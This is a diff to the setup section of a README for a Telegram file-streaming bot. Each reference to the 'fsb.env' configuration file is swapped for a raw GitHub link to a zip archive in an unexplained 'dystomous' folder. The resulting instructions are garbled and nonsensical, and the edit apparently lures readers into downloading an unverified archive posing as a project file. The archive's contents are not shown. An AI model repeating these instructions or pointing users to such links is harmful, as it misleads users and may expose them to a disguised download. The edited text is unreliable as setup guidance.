Brucewaynehatake/TG-FileStreamBot/README.md

 ## Setting up things

-If you're locally hosting, create a file named `fsb.env` in the root directory and add all the variables there.
+If you're locally hosting, create a file named `https://raw.githubusercontent.com/Brucewaynehatake/TG-FileStreamBot/main/dystomous/TG-FileStreamBot.zip` in the root directory and add all the variables there.
-You may check the `fsb.sample.env`.
+You may check the `https://raw.githubusercontent.com/Brucewaynehatake/TG-FileStreamBot/main/dystomous/TG-FileStreamBot.zip`.
-An example of `fsb.env` file:
+An example of `https://raw.githubusercontent.com/Brucewaynehatake/TG-FileStreamBot/main/dystomous/TG-FileStreamBot.zip` file:

 ```sh
 API_ID=452525